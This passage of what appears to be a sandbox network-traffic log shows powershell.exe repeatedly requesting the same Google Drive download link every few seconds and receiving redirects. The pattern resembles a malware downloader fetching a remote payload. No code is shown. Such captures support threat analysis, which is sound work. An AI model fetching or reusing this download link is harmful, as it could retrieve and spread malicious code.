                                  2024-09-30 07:58:54 UTC | 97 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:58:54 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:54 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-K8GRp_-NLP6iXL5oe4BrTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  12 | 192.168.2.9 | 57673 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:59 UTC | 121 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:59 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:59 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Bxeabr6YzKNGmltEFtm7TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  13         | 192.168.2.9 | 57674       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:04 UTC | 97                | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:59:04 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:04 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-98EWQQVhbkpOVMVt5sr_rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  14         | 192.168.2.9 | 57675       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:09 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:09 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:09 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-l1GUvqizF68jxd_i6YtKNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  15         | 192.168.2.9 | 57677       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:14 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:14 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:14 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-d_CvC8nak__N8tbP71qQXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  16         | 192.168.2.9 | 57678       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:19 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:19 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:19 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-DBUB9ICD6vurMDs_LfAZhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  17         | 192.168.2.9 | 57679       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:24 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:24 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:24 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce--F6LyA0aVi3yQo-PCZNzwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  18         | 192.168.2.9 | 57680       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:29 UTC | 97                | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:59:30 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:29 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-M4XoJ_HWf4_S1dgIe3qIOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  19         | 192.168.2.9 | 57681       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:35 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:36 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:35 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-YykLlPywab-6hEaTe0w6BA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  20         | 192.168.2.9 | 57682       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:40 UTC | 97                | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:59:41 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:40 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-ry4vHU8cSctO5t9jkc5HGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  21         | 192.168.2.9 | 57684       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:45 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:46 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:46 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-tsT3CKu222tCTrkPOFDsdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  22         | 192.168.2.9 | 57685       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:51 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:51 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:51 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-m1khy1mwy_ucdbSdVUwi0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  23         | 192.168.2.9 | 57687       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 07:59:56 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:59:56 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:59:56 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-7SlKjJcVn7dBQ0eO8o0wIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  24         | 192.168.2.9 | 57688       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
                                  2024-09-30 08:00:01 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 08:00:01 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 08:00:01 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-kYqepcrvLIGA3m4yI5933g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                  25         | 192.168.2.9 | 57689       | 142.250.186.174 | 443              | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp               | Bytes transferred | Direction | Data
